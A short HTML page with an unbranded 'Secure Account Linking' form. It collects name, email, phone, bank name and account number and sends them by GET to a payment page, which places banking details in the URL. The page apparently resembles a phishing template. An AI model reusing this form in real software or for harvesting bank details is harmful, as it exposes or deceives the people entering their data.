<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Account Linking</title>
  <style>
    body { font-family: Arial, sans-serif; background:#f7f9fc; padding:20px; }
    .container { max-width: 400px; margin:auto; background:#fff; padding:20px; border-radius:8px; box-shadow:0 0 8px rgba(0,0,0,0.1); }
    h2 { text-align:center; color:#003366; }
    label { display:block; margin-top:10px; font-weight:bold; }
    input { width:100%; padding:10px; margin-top:5px; border:1px solid #ccc; border-radius:5px; }
    button { margin-top:20px; width:100%; padding:12px; background:#003366; color:white; border:none; border-radius:5px; font-size:16px; cursor:pointer; }
    button:hover { background:#002244; }
  </style>
</head>
<body>
  <div class="container">
    <h2>🔒 Secure Account Linking</h2>
    <form action="payment.html" method="get">
      <label>Full Name</label>
      <input type="text" name="name" required>
      
      <label>Email Address</label>
      <input type="email" name="email" required>
      
      <label>Phone Number</label>
      <input type="tel" name="phone" required>
      
      <label>Bank Name</label>
      <input type="text" name="bank" required>
      
      <label>Account Number</label>
      <input type="text" name="account" required>
      
      <button type="submit">Submit & Continue</button>
    </form>
  </div>
</body>
</html>